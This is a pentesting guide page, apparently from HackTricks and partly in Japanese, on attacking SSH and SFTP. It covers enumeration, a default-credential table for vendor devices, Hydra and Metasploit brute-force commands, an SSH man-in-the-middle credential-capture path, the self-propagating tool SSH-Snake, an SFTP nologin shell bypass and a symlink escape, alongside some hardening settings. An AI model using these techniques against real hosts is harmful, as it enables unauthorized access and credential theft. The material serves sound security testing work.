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22 - SSH/SFTPのペンテスト

htARTEHackTricks AWS Red Team Expert でAWSハッキングをゼロからヒーローまで学ぶ



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**SSHSecure ShellまたはSecure Socket Shell**は、セキュアな接続を可能にするネットワークプロトコルであり、セキュリティのないネットワーク経由でコンピュータに安全に接続することができます。リモートシステムにアクセスする際にデータの機密性と整合性を維持するために重要です。

デフォルトポート: 22

22/tcp open  ssh     syn-ack


  • openSSH OpenBSD SSH、BSD、Linuxディストリビューション、およびWindowsWindows 10以降に搭載されています
  • Dropbear 低メモリとプロセッサリソース環境向けのSSH実装で、OpenWrtに搭載されています
  • PuTTY Windows向けのSSH実装で、クライアントは一般的に使用されていますが、サーバーの使用は稀です
  • CopSSH Windows向けのOpenSSHの実装


  • libssh SSHv2プロトコルを実装したマルチプラットフォームのCライブラリで、PythonPerl、およびR向けのバインディングがあります。KDEではsftpに使用され、GitHubではgit SSHインフラに使用されています
  • wolfSSH ANSI Cで記述されたSSHv2サーバーライブラリで、組み込み、RTOS、およびリソース制約の環境向けです
  • Apache MINA SSHD Apache SSHD JavaライブラリはApache MINAに基づいています
  • paramiko Python SSHv2プロトコルライブラリ



nc -vn <IP> 22





  • SSH1およびSSH2プロトコルサーバーサポート;
  • SSHクライアント構成の分析;
  • バナーの取得、デバイスまたはソフトウェアおよびオペレーティングシステムの認識、圧縮の検出;
  • 鍵交換、ホストキー、暗号化およびメッセージ認証コードアルゴリズムの収集;
  • アルゴリズム情報の出力(利用可能な期間、削除/無効化、安全でない/弱い/レガシーなど);
  • アルゴリズムの推奨事項の出力(認識されたソフトウェアバージョンに基づいて追加または削除);
  • セキュリティ情報の出力関連する問題、割り当てられたCVEリストなど;
  • アルゴリズム情報に基づいたSSHバージョンの互換性の分析;
  • OpenSSH、Dropbear SSH、libsshからの履歴情報;
  • LinuxおよびWindowsで実行可能;
  • 依存関係なし
usage: ssh-audit.py [-1246pbcnjvlt] <host>

-1,  --ssh1             force ssh version 1 only
-2,  --ssh2             force ssh version 2 only
-4,  --ipv4             enable IPv4 (order of precedence)
-6,  --ipv6             enable IPv6 (order of precedence)
-p,  --port=<port>      port to connect
-b,  --batch            batch output
-c,  --client-audit     starts a server on port 2222 to audit client
software config (use -p to change port;
use -t to change timeout)
-n,  --no-colors        disable colors
-j,  --json             JSON output
-v,  --verbose          verbose output
-l,  --level=<level>    minimum output level (info|warn|fail)
-t,  --timeout=<secs>   timeout (in seconds) for connection and reading
(default: 5)
$ python3 ssh-audit <IP>



ssh-keyscan -t rsa <IP> -p <PORT>




nmap -p22 <ip> -sC # Send default nmap scripts for SSH
nmap -p22 <ip> -sV # Retrieve version
nmap -p22 <ip> --script ssh2-enum-algos # Retrieve supported algorythms
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full # Retrieve weak keys
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # Check authentication methods


  • ssh

Brute force usernames, passwords and private keys



msf> use scanner/ssh/ssh_enumusers

Brute force






msf> use scanner/ssh/ssh_identify_pubkeys

Known badkeys can be found here:

{% embed url="https://github.com/rapid7/ssh-badkeys/tree/master/authorized" %}

Weak SSH keys / Debian predictable PRNG

Some systems have known flaws in the random seed used to generate cryptographic material. This can result in a dramatically reduced keyspace which can be bruteforced. Pre-generated sets of keys generated on Debian systems affected by weak PRNG are available here: g0tmi1k/debian-ssh.

You should look here in order to search for valid keys for the victim machine.


crackmapexec using the ssh protocol can use the option --kerberos to authenticate via kerberos.
For more info run crackmapexec ssh --help.

Default Credentials

Vendor Usernames Passwords
APC apc, device apc
Brocade admin admin123, password, brocade, fibranne
Cisco admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin admin, Admin123, default, password, secur4u, cisco, Cisco, _Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme
Citrix root, nsroot, nsmaint, vdiadmin, kvm, cli, admin C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler
D-Link admin, user private, admin, user
Dell root, user1, admin, vkernel, cli calvin, 123456, password, vkernel, Stor@ge!, admin
EMC admin, root, sysadmin EMCPMAdm7n, Password#1, Password123#, sysadmin, changeme, emc
HP/3Com admin, root, vcx, app, spvar, manage, hpsupport, opc_op admin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC_op, !manage, !admin
Huawei admin, root 123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123
IBM USERID, admin, manager, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, system, device, ufmcli, customer PASSW0RD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer
Juniper netscreen netscreen
NetApp admin netapp123
Oracle root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user changeme, ilom-admin, ilom-operator, welcome1, oracle
VMware vi-admin, root, hqadmin, vmware, admin vmware, vmw@re, hqadmin, default


If you are in the local network as the victim which is going to connect to the SSH server using username and password you could try to perform a MitM attack to steal those credentials:

Attack path:

  • Traffic Redirection: The attacker diverts the victim's traffic to their machine, effectively intercepting the connection attempt to the SSH server.
  • Interception and Logging: The attacker's machine acts as a proxy, capturing the user's login details by pretending to be the legitimate SSH server.
  • Command Execution and Relay: Finally, the attacker's server logs the user's credentials, forwards the commands to the real SSH server, executes them, and sends the results back to the user, making the process appear seamless and legitimate.

SSH MITM does exactly what is described above.

In order to capture perform the actual MitM you could use techniques like ARP spoofing, DNS spoofin or others described in the Network Spoofing attacks.


If you want to traverse a network using discovered SSH private keys on systems, utilizing each private key on each system for new hosts, then SSH-Snake is what you need.

SSH-Snake performs the following tasks automatically and recursively:

  1. On the current system, find any SSH private keys,
  2. On the current system, find any hosts or destinations (user@host) that the private keys may be accepted,
  3. Attempt to SSH into all of the destinations using all of the private keys discovered,
  4. If a destination is successfully connected to, repeats steps #1 - #4 on the connected-to system.

It's completely self-replicating and self-propagating -- and completely fileless.

Config Misconfigurations

Root login

It's common for SSH servers to allow root user login by default, which poses a significant security risk. Disabling root login is a critical step in securing the server. Unauthorized access with administrative privileges and brute force attacks can be mitigated by making this change.

To Disable Root Login in OpenSSH:

  1. Edit the SSH config file with: sudoedit /etc/ssh/sshd_config
  2. Change the setting from #PermitRootLogin yes to PermitRootLogin no.
  3. Reload the configuration using: sudo systemctl daemon-reload
  4. Restart the SSH server to apply changes: sudo systemctl restart sshd

SFTP Brute Force

SFTP command execution

There is a common oversight occurs with SFTP setups, where administrators intend for users to exchange files without enabling remote shell access. Despite setting users with non-interactive shells (e.g., /usr/bin/nologin) and confining them to a specific directory, a security loophole remains. Users can circumvent these restrictions by requesting the execution of a command (like /bin/bash) immediately after logging in, before their designated non-interactive shell takes over. This allows for unauthorized command execution, undermining the intended security measures.

Example from here:

ssh -v noraj@ id
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to ([]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
uid=1000(noraj) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
Bytes per second: sent 43133.4, received 44349.5
debug1: Exit status 0

$ ssh noraj@ /bin/bash

以下は、ユーザーnorajのセキュアなSFTP構成の例です/etc/ssh/sshd_config openSSH:

Match User noraj
ChrootDirectory %h
ForceCommand internal-sftp
AllowTcpForwarding no
PermitTunnel no
X11Forwarding no
PermitTTY no




sudo ssh -L <local_port>:<remote_host>:<remote_port> -N -f <username>@<ip_compromised>

SFTP シンボリックリンク

sftp には symlink コマンドがあります。したがって、あるフォルダで 書き込み権限 がある場合、他のフォルダ/ファイルシンボリックリンク を作成できます。おそらくあなたは chroot閉じ込められている ため、これはあなたにとって 特に有用ではないかもしれませんが、作成した シンボリックリンクno-chroot サービス から アクセスできる場合たとえば、Web からシンボリックリンクにアクセスできる場合)、Web を介してシンボリックリンクされたファイルを開くことができます。

たとえば、新しいファイル "froot" から "/" への シンボリックリンク を作成するには:

sftp> symlink / froot



ssh -v
OpenSSH_8.1p1, OpenSSL 1.1.1d  10 Sep 2019
debug1: Authentications that can continue: publickey,password,keyboard-interactive


ssh -v -o PreferredAuthentications=password
debug1: Next authentication method: password






Bug bounty tip: sign up for Intigriti, a premium bug bounty platform created by hackers, for hackers! Join us at https://go.intigriti.com/hacktricks today, and start earning bounties up to $100,000!

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HackTricks Automatic Commands

Protocol_Name: SSH
Port_Number: 22
Protocol_Description: Secure Shell Hardening

Name: Hydra Brute Force
Description: Need Username
Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 {IP} ssh

Name: consolesless mfs enumeration
Description: SSH enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use scanner/ssh/ssh_enumusers; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ssh/juniper_backdoor; set RHOSTS {IP}; set RPORT 22; run; exit'

AWSハッキングをゼロからヒーローまで学ぶ htARTEHackTricks AWS Red Team Expert
